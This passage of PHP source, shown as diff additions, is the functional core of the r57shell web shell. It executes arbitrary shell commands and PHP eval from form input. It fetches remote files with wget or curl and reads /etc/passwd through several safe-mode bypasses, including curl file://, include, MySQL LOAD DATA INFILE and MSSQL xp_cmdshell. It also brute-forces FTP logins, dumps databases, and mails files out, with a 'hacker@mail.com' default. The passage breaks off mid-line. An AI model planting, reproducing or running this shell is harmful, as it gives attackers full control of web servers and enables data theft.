switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." 
-o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." 
|| $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! 
Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." 
- success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! 
Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! 
Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://rst.void.ru\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! 
Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." 
(".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function up_down($id) + { + global $lang; + global $language; + return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select 
name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." 
* ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo 
$table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' 
'.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo 
sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." 
( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +$arh = 
